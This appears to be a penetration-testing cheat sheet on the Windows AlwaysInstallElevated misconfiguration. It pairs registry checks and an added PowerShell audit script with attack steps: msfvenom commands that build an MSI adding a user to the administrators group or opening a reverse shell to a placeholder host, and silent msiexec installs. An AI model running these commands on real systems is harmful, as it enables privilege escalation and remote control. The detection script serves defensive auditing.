Always Install Elevated

Check with:

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

In the output, check that the "AlwaysInstallElevated" value is 1. It must be set to 1 in both keys (HKCU and HKLM) to be exploitable.
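
A defender-side audit of the same two values, as an added example that is not part of the original page: it goes beyond the two `reg query` commands by checking every loaded user hive under HKEY_USERS rather than only the current user's HKCU. The function name `Get-AlwaysInstallElevated` and the report field names are hypothetical.

```powershell
# Added example: report where AlwaysInstallElevated is set, and where both
# the machine value and a user value are 1 (the condition the page describes).
function Get-AlwaysInstallElevated {
    param([Parameter(Mandatory)][string]$KeyPath)
    # A missing key or value means the policy is not configured; treat as 0.
    $item = Get-ItemProperty -Path $KeyPath -Name AlwaysInstallElevated -ErrorAction SilentlyContinue
    if ($null -eq $item) { return 0 }
    return [int]$item.AlwaysInstallElevated
}

$sub     = 'SOFTWARE\Policies\Microsoft\Windows\Installer'
$machine = Get-AlwaysInstallElevated -KeyPath "Registry::HKEY_LOCAL_MACHINE\$sub"

# HKCU is a view of one hive under HKEY_USERS, so enumerate every loaded
# user hive. Hives this account cannot read are skipped silently.
$report = Get-ChildItem -Path 'Registry::HKEY_USERS' -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -match '^S-1-(5-21|12-1)-[\d-]+$' } |   # skips *_Classes and service SIDs
    ForEach-Object {
        $user = Get-AlwaysInstallElevated -KeyPath "Registry::HKEY_USERS\$($_.PSChildName)\$sub"
        [pscustomobject]@{
            ComputerName = $env:COMPUTERNAME
            UserSid      = $_.PSChildName
            HKLM         = $machine
            HKU          = $user
            # Only exploitable when the value is 1 in both places.
            Exposed      = ($machine -eq 1 -and $user -eq 1)
            # One side set is not exploitable alone, but should still be cleaned up.
            PartiallySet = (($machine -eq 1) -xor ($user -eq 1))
        }
    }

$report | Format-Table -AutoSize

if ($report | Where-Object Exposed) {
    Write-Warning 'AlwaysInstallElevated is 1 in HKLM and in at least one user hive.'
}
```

Run it from an elevated prompt to read other users' loaded hives; accounts that are not logged on have no hive loaded under HKEY_USERS and are not covered.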

Steps:

# Generate payload to add user to admin group
msfvenom -p windows/exec CMD='net localgroup administrators user /add' -f msi-nouac -o setup.msi

OR

# Create a reverse shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f msi -o reverse.msi

# Run it on the target machine (the reverse shell needs a netcat listener):
msiexec /quiet /qn /i setup.msi
msiexec /quiet /qn /i reverse.msi
